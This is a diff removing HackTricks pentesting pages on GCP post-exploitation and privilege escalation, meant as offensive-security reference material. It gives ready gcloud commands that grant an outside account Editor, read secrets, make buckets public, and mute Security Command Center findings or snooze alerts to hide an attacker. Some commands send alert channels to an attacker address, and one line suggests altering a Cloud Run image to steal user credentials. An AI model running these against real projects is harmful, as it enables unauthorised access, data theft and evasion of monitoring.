- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### `cloudbuild.builds.approve` - -With this permission you can approve the execution of a **codebuild that require approvals**. - -```bash -# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve -curl -X POST \ - -H "Authorization: Bearer $(gcloud auth print-access-token)" \ - -H "Content-Type: application/json" \ - -d '{{ - "approvalResult": { - object (ApprovalResult) - } - }' \ - "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md deleted file mode 100644 index 0e6bdccac..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Cloud Run Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Access the images - -If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. - -If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service. - -### Modify & redeploy the image - -Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md deleted file mode 100644 index 037d748cf..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# GCP - Filestore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Mount Filestore - -A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**: - -{% code overflow="wrap" %} -```bash -sudo apt-get update -sudo apt-get install nfs-common -# Check the share name -showmount -e -# Mount the share -mkdir /mnt/fs -sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs -``` -{% endcode %} - -To find the IP address of a filestore insatnce check the enumeration section of the page: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Remove Restrictions and get extra permissions - -If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. 
It's also possible to grant more privileges over your IP address to have admin access over the share: - -```bash -gcloud filestore instances update nfstest \ - --zone= \ - --flags-file=nfs.json - -# Contents of nfs.json -{ - "--file-share": - { - "capacity": "1024", - "name": "", - "nfs-export-options": [ - { - "access-mode": "READ_WRITE", - "ip-ranges": [ - "/32" - ], - "squash-mode": "NO_ROOT_SQUASH", - "anon_uid": 1003, - "anon_gid": 1003 - } - ] - } -} -``` - -### Restore a backup - -If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:** - -```bash -# Create a new filestore if you don't want to modify the old one -gcloud filestore instances create \ - --zone= \ - --tier=STANDARD \ - --file-share=name=vol1,capacity=1TB \ - --network=name=default,reserved-ip-range=10.0.0.0/29 - -# Restore a backups in a new instance -gcloud filestore instances restore \ - --zone= \ - --file-share= \ - --source-backup= \ - --source-backup-region= - -# Follow the previous section commands to mount it -``` - -### Create a backup and restore it - -If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned: - -{% code overflow="wrap" %} -```bash -# Create share backup -gcloud filestore backups create \ - --region= \ - --instance= \ - --instance-zone= \ - --file-share= - -# Follow the previous section commands to restore it and mount it -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md deleted file mode 100644 index 4181accdc..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -You can find further information about IAM in: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Granting access to management console - -Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. - -To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. - -You can use the following command to **grant a user the primitive role of Editor** to your existing project: - -{% code overflow="wrap" %} -```bash -gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor -``` -{% endcode %} - -If you succeeded here, try **accessing the web interface** and exploring from there. - -This is the **highest level you can assign using the gcloud tool**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md deleted file mode 100644 index d1ec7ef27..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md +++ /dev/null @@ -1,146 +0,0 @@ -# GCP - Monitoring Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Monitoring - -Fore more information check: - -{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} -[gcp-monitoring-enum.md](../gcp-services/gcp-monitoring-enum.md) -{% endcontent-ref %} - -For other ways to disrupt logs check: - -{% content-ref url="gcp-logging-post-exploitation.md" %} -[gcp-logging-post-exploitation.md](gcp-logging-post-exploitation.md) -{% endcontent-ref %} - -### `monitoring.alertPolicies.delete` - -Delete an alert policy: - -```bash -gcloud alpha monitoring policies delete -``` - -### `monitoring.alertPolicies.update` - -Disrupt an alert policy: - -```bash -# Disable policy -gcloud alpha monitoring policies update --no-enabled - -# Remove all notification channels -gcloud alpha monitoring policies update --clear-notification-channels - -# Chnage notification channels -gcloud alpha monitoring policies update --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL - -# Modify alert conditions -gcloud alpha monitoring policies update --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... 
}" -# or use --policy-from-file -``` - -### `monitoring.dashboards.update` - -Modify a dashboard to disrupt it: - -```bash -# Disrupt dashboard -gcloud monitoring dashboards update --config=''' - displayName: New Dashboard with New Display Name - etag: 40d1040034db4e5a9dee931ec1b12c0d - gridLayout: - widgets: - - text: - content: Hello World - ''' -``` - -### `monitoring.dashboards.delete` - -Delete a dashboard: - -```bash -# Delete dashboard -gcloud monitoring dashboards delete -``` - -### `monitoring.snoozes.create` - -Prevent policies from generating alerts by creating a snoozer: - -{% code overflow="wrap" %} -```bash -# Stop alerts by creating a snoozer -gcloud monitoring snoozes create --display-name="Maintenance Week" \ - --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ - --start-time="2023-03-01T03:00:00.0-0500" \ - --end-time="2023-03-07T23:59:59.5-0500" -``` -{% endcode %} - -### `monitoring.snoozes.update` - -Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: - -{% code overflow="wrap" %} -```bash -# Modify the timing of a snooze -gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME - -# odify everything, including affected policies -gcloud monitoring snoozes update --snooze-from-file= -``` -{% endcode %} - -### `monitoring.notificationChannels.delete` - -Delete a configured channel: - -```bash -# Delete channel -gcloud alpha monitoring channels delete -``` - -### `monitoring.notificationChannels.update` - -Update labels of a channel to disrupt it: - -{% code overflow="wrap" %} -```bash -# Delete or update labels, for example email channels have the email indicated here -gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels -gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS 
Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md deleted file mode 100644 index d6be15c5f..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secretmanager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secretmanager - -For more information about Secret Manager check: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md deleted file mode 100644 index 745566afa..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md +++ /dev/null @@ -1,94 +0,0 @@ -# GCP - Security Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security - -For more information check: - -{% content-ref url="../gcp-services/gcp-security-enum.md" %} -[gcp-security-enum.md](../gcp-services/gcp-security-enum.md) -{% endcontent-ref %} - -### `securitycenter.muteconfigs.create` - -Prevent generation of findings that could detect an attacker by creating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Create Muteconfig -gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.muteconfigs.update` - -Prevent generation of findings that could detect an attacker by updating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Update Muteconfig -gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.findings.bulkMuteUpdate` - -Mute findings based on a filer: - -{% code overflow="wrap" %} -```bash -# Mute based on a filter -gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -A muted finding won't appear in the SCC dashboard and reports. - -### `securitycenter.findings.setMute` - -Mute findings based on source, findings... 
- -{% code overflow="wrap" %} -```bash -gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED -``` -{% endcode %} - -### `securitycenter.findings.update` - -Update a finding to indicate erroneous information: - -{% code overflow="wrap" %} -```bash -gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md deleted file mode 100644 index 8f1ee1317..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md +++ /dev/null @@ -1,60 +0,0 @@ -# GCP - Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Storage - -For more information about CLoud Storage check this page: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Give Public Access - -It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket: - -```bash -# Disable public prevention -gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention - -# Make all objects in a bucket public -gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer -## I don't think you can make specific objects public just with IAM - -# Make a bucket or object public (via ACL) -gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER -gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER -``` - -If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access` - -To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md deleted file mode 100644 index af354beb0..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Workflows Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Workflow - -Basic information: - -{% content-ref url="../gcp-services/gcp-workflows-enum.md" %} -[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section: - -{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %} -[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md deleted file mode 100644 index b8c3adc3a..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Apikeys Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Apikeys - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -For other ways to create API keys check: - -{% content-ref url="gcp-serviceusage-privesc.md" %} -[gcp-serviceusage-privesc.md](gcp-serviceusage-privesc.md) -{% endcontent-ref %} - -### Brute Force API Key access - -As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -### `apikeys.keys.create` - -This permission allows to **create an API key**: - -```bash -gcloud services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]==\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). 
